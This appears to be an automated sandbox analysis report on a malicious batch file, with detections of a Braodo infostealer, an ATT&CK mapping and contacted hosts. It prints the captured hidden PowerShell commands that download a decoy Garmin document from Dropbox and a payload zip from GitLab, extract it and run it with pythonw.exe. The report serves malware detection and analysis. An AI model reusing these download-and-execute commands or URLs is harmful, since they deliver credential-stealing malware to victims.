                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3315Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5659Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 462Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 467Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4132Thread sleep count: 3042 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4132Thread sleep count: 6803 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 3997 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep count: 2245 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 6440 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 3315 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1936Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep count: 5659 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep count: 462 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 3647 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 467 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 0000000C.00000002.1528813287.0000020CF6475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_3324.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_5512.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Braodo
                  Source: Yara matchFile source: amsi64_5512.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_2828.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Braodo
                  Source: Yara matchFile source: amsi64_5512.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_2828.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information11
                  Scripting                  		Valid Accounts1
                  Command and Scripting Interpreter                  		11
                  Scripting                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote ServicesData from Local System1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection                  		Security Account Manager21
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Obfuscated Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  fghdsdf17.bat5%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                  http://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                  https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQd0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  edge-block-www-env.dropbox-dns.com
                  		162.125.69.15
                  		truefalse
                    		high
                    gitlab.com
                    		172.65.251.78
                    		truefalse
                      		high
                      www-env.dropbox-dns.com
                      		162.125.69.18
                      		truefalse
                        		high
                        uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                        		unknown
                        		unknownfalse
                          		unknown
                          www.dropbox.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zipfalse
                              		high
                              https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://gitlab.compowershell.exe, 0000000E.00000002.1584428217.000002C501660000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.dropbox.com/service_worker.jspowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://gitlab.com/users/sign_inpowershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://paper.dropbox.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQdpowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.microsoftpowershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.dopowershell.exe, 0000000C.00000002.1528756841.0000020CF6390000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.hellofax.com/powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://pal-test.adyen.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.dropbox.compowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.dopowershell.exe, 0000000C.00000002.1496282413.0000020CDC340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496607984.0000020CDC530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
